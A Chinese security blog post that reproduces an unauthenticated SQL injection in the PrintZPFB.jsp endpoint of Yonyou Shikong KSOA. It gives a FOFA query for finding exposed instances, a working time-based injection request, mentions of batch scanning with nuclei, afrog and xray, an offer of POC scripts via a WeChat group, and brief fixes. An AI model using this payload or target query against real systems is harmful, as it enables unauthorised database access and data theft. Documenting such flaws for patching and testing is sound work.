首页 > 数据库 >【漏洞复现】用友时空KSOA PrintZPFB.jsp SQL注入漏洞

【漏洞复现】用友时空KSOA PrintZPFB.jsp SQL注入漏洞

时间:2024-08-01 10:53:04浏览次数:14  
标签:PrintZPFB 用友 KSOA 漏洞 jsp SQL

0x01 产品简介

用友时空 KSOA 是建立在 SOA 理念指导下研发的新一代产品,是根据流通企业前沿的 IT 需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。

0x02 漏洞概述

用友时空KSOA系统 PrintZPFB.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

app="用友-时空KSOA"

在这里插入图片描述

0x04 漏洞复现

GET /kp/PrintZPFB.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

执行2次
在这里插入图片描述

sqlmap验证

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、及时升级到安全版本

标签:PrintZPFB,用友,KSOA,漏洞,jsp,SQL
From: https://blog.csdn.net/m0_60571842/article/details/140842139

相关文章

  • [SPON IP]网络对讲广播系统的命令执行漏洞实验
    产品简介                 世邦通信SPONIP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。-----------------------------------漏洞描述                世邦通......
  • 安全测试--常见漏洞--XSS
    漏洞简介Cross-SiteScripting(为了与CSS区别,安全领域叫做XSS)攻击是注入的一种,主要是将恶意脚本注入到可信站点的HTML页面等网页文件中,当攻击者将带有恶意脚本的网页链接发送给用户,用户打开链接,浏览器会认为恶意脚本来自可信站点而执行举个例子 @app.route("/")defindex():......
  • 方天云智慧平台系统 Upload.ashx 任意文件上传漏洞复现
    0x01产品简介方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案......
  • 方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞复现
    0x01产品简介方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案......
  • [SUCTF 2019]Pythonginx (unicode转IDNA域名分割漏洞)
    代码我看到这两个就感觉有问题了,第一个转编码这个搜了一下是unicode转idna的问题,第二个urlopen是Python标准库中urllib.request模块中的一个函数,用于向指定的URL发送HTTP请求并获取响应参考文章:https://xz.aliyun.com/t/6070?time__1311=n4%2BxnD0DgDcmG%3DrDsYoxCqiIQ7KDtH......
  • WeiPHP5.0 sql注入漏洞
    侵权声明本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[[email protected]]。我们将在确......
  • phpstudy_2016-2018_rce_backdoor漏洞复现
    phpstudy_2016-2018_rce_backdoor说明内容漏洞编号phpstudy_2016-2018_rce漏洞名称RCE(RemoteCommand|CodeExecute)漏洞评级高危影响范围phpStudy2016、phpStudy2018漏洞描述攻击者可以利用该漏洞执行PHP命令,也可以称作phpStudy后门。漏洞描述攻击者可以利用该漏......
  • 文件解析漏洞总结(IIS,NGINX,APACHE)
    目录一、IIS解析漏洞IIS6.X方式一:目录解析方式二:畸形文件解析IIS7.X利用条件环境配置下载链接:二、Nginx解析漏洞2.1:nginx_parsing利用条件利用姿势2.2:CVE-2013-4547影响版本利用姿势三、Apache解析漏洞3.1:apache_parsing利用姿势3.2:CVE-2017-15715影响版......
  • 文件解析漏洞合集
    IIS解析漏洞IIS6目录解析打开windows——server2003,在wwwroot目录下创建1.asp,在其中创建的所有文件都会在访问时以asp解析出来畸形文件解析在wwwroot目录下创建2.asp;.jpg,此文件上传时是.jpg后缀,但解析时由于iis6文件解析漏洞,;及其后的.jpg不被解析......
  • 文件解析漏洞复现
    一、IIS6.X1.在网站目录创建文件夹名为xxx.asp/xxx.asa文件夹,里面的任意文件都会被当作asp文件执行创建1.asp访问2.ooo.asp.jpg会被当做asp文件执行创建一个ooo.asp;.jpg访问二、IIS7.X上传1.jpg文件在网址后+/.php可以成功执行写一个1.jpg文件内容如下上传到......